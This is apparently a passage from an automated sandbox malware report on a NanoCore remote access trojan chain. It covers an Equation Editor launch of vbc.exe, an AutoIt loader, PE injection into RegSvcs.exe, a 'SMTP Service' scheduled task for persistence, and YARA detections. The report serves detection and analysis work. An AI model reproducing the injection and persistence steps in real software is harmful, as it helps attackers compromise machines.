Source: C:\Users\Public\vbc.exe	Code function: 4_2_0026A2DF FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0027AFB9 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00289FD3 FindFirstFileExA,
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FE399B GetFileAttributesW,FindFirstFileW,FindClose,
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FFBCB3 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_01002408 FindFirstFileW,Sleep,FindNextFileW,FindClose,
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FF280D FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_01028877 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FE1A73 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_0100CAE7 FindFirstFileW,FindNextFileW,FindClose,
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_0100DE7C FindFirstFileW,FindClose,
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FFBF17 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 5_2_00FBEE30 LoadLibraryA,GetProcAddress,

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00286AF3 mov eax, dword ptr fs:[00000030h]

Source: C:\Users\Public\vbc.exe

Code function: 4_2_0027E4F5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

Source: C:\Users\Public\vbc.exe

Code function: 4_2_0028ACA1 GetProcessHeap,

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 5_2_0100A35D BlockInput,

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe

Memory allocated: page read and write | page guard

Source: C:\Users\Public\vbc.exe	Code function: 4_2_0027E643 SetUnhandledExceptionFilter,
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0027E4F5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0027E7FB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00287BE1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FCF170 SetUnhandledExceptionFilter,
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FCA128 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FC7CCD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

HIPS / PFW / Operating System Protection Evasion:

Allocates memory in foreign processes

Show sources

Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Memory allocated: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 340000 protect: page execute and read and write
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Memory allocated: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 2D0000 protect: page execute and read and write

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 340000 value starts with: 4D5A
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 2D0000 value starts with: 4D5A

Writes to foreign memory regions

Show sources

Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 340000
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 7EFDE000
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 2D0000
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 7EFDE000

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 5_2_00FE43FF GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\user\33920049\mmuiqlcvwo.pif 'C:\Users\user\33920049\mmuiqlcvwo.pif' fmkkelc.omp
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp7677.tmp'
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe 0
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 5_2_00FE6C61 LogonUserW,

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 5_2_00FBD7A0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 5_2_00FE3321 __wcsicoll,mouse_event,__wcsicoll,mouse_event,

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 5_2_00FF602A GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

Source: RegSvcs.exe, 00000006.00000002.667114427.0000000002933000.00000004.00000001.sdmp	Binary or memory string: Program Manager48
Source: RegSvcs.exe, 00000006.00000002.667096389.000000000291F000.00000004.00000001.sdmp, mmuiqlcvwo.pif, 0000000C.00000002.666244270.0000000000E9D000.00000004.00000001.sdmp	Binary or memory string: Program Manager
Source: mmuiqlcvwo.pif.4.dr	Binary or memory string: IDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript PausedblankinfoquestionstopwarningAutoIt -
Source: mmuiqlcvwo.pif, RegSvcs.exe, 00000006.00000002.666553856.0000000000F40000.00000002.00020000.sdmp, taskeng.exe, 00000009.00000002.666109150.0000000000810000.00000002.00020000.sdmp, mmuiqlcvwo.pif, 0000000C.00000002.666579766.0000000001220000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: mmuiqlcvwo.pif, 00000005.00000002.666027281.000000000062D000.00000004.00000001.sdmp, mmuiqlcvwo.pif, 0000000C.00000002.666244270.0000000000E9D000.00000004.00000001.sdmp	Binary or memory string: If WinGetText("Program Manager") = "0" Then
Source: mmuiqlcvwo.pif, 00000005.00000002.666605322.00000000013F0000.00000002.00020000.sdmp, RegSvcs.exe, 00000006.00000002.666553856.0000000000F40000.00000002.00020000.sdmp, taskeng.exe, 00000009.00000002.666109150.0000000000810000.00000002.00020000.sdmp, mmuiqlcvwo.pif, 0000000C.00000002.666579766.0000000001220000.00000002.00020000.sdmp	Binary or memory string: !Progman
Source: mmuiqlcvwo.pif, 00000005.00000002.666027281.000000000062D000.00000004.00000001.sdmp	Binary or memory string: Program ManagerV
Source: mmuiqlcvwo.pif, 00000005.00000000.479651653.0000000001032000.00000002.00020000.sdmp, mmuiqlcvwo.pif, 0000000C.00000000.511159853.0000000001032000.00000002.00020000.sdmp	Binary or memory string: ASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript PausedblankinfoquestionstopwarningAutoIt -
Source: mmuiqlcvwo.pif, 00000005.00000002.666605322.00000000013F0000.00000002.00020000.sdmp, RegSvcs.exe, 00000006.00000002.666553856.0000000000F40000.00000002.00020000.sdmp, taskeng.exe, 00000009.00000002.666109150.0000000000810000.00000002.00020000.sdmp, mmuiqlcvwo.pif, 0000000C.00000002.666579766.0000000001220000.00000002.00020000.sdmp	Binary or memory string: Program Manager<
Source: RegSvcs.exe, 00000006.00000002.667114427.0000000002933000.00000004.00000001.sdmp	Binary or memory string: Program Manager@

Source: C:\Users\Public\vbc.exe

Code function: GetLocaleInfoW,GetNumberFormatW,

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Ente96d83b35#\692ae41749625908a626fd813aa21688\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation

Source: C:\Users\Public\vbc.exe

Code function: 4_2_0027E34B cpuid

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: C:\Users\Public\vbc.exe

Code function: 4_2_0027CBB8 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,DeleteObject,CloseHandle,

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 5_2_00FCE284 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 5_2_01022BF9 GetUserNameW,

Source: C:\Users\Public\vbc.exe

Code function: 4_2_0026A995 GetVersionExW,

Stealing of Sensitive Information:

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.3a5d828.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.ae4629.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.39f7c18.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.3a5d828.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.ae0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.36e02a4.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3c4d828.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.ae0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.34ab46e.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.3933240.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3be7c18.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.36e02a4.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3be7c18.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.39f7c18.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.39f7c18.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.340000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.34b02a4.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.34b02a4.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3b23240.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.36db46e.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3c4d828.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.36e48cd.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3be7c18.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.3933240.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.39f7c18.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3be7c18.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.2d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.34b48cd.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000003.492083819.00000000039F7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.536331562.0000000003699000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.522442695.0000000003B82000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.666071975.0000000000342000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491934480.0000000004162000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491184816.0000000003A2B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491143787.0000000003A6B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.490064589.0000000003901000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.521731464.0000000003C31000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.520532031.0000000003BB5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.521599703.0000000003C5B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.490024327.00000000039C5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.667048040.0000000003900000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.522232406.0000000003BB5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.667083533.0000000003AF0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.667252127.00000000034A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.522514317.0000000003BE7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.535887495.00000000002D2000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.520588500.0000000003AF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.492022821.0000000003992000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.521632890.0000000003C1B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.522352198.0000000004232000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491708998.00000000039C5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.536291326.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.666422820.0000000000AE0000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491322689.0000000003A2B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mmuiqlcvwo.pif PID: 2516, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 2780, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mmuiqlcvwo.pif PID: 2568, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 684, type: MEMORYSTR

Source: mmuiqlcvwo.pif	Binary or memory string: WIN_XP
Source: mmuiqlcvwo.pif	Binary or memory string: WIN_XPe
Source: mmuiqlcvwo.pif	Binary or memory string: WIN_VISTA
Source: mmuiqlcvwo.pif.4.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte!
Source: mmuiqlcvwo.pif	Binary or memory string: WIN_7
Source: mmuiqlcvwo.pif	Binary or memory string: WIN_8

Remote Access Functionality:

Detected Nanocore Rat

Show sources

Source: mmuiqlcvwo.pif, 00000005.00000003.492083819.00000000039F7000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 00000006.00000002.666350184.0000000000A30000.00000004.00020000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 00000006.00000002.666350184.0000000000A30000.00000004.00020000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: mmuiqlcvwo.pif, 0000000C.00000003.522442695.0000000003B82000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.536331562.0000000003699000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.536331562.0000000003699000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.3a5d828.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.ae4629.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.39f7c18.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.3a5d828.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.ae0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.36e02a4.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3c4d828.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.ae0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.34ab46e.9.raw.unpack, type: UNPACKEDPE
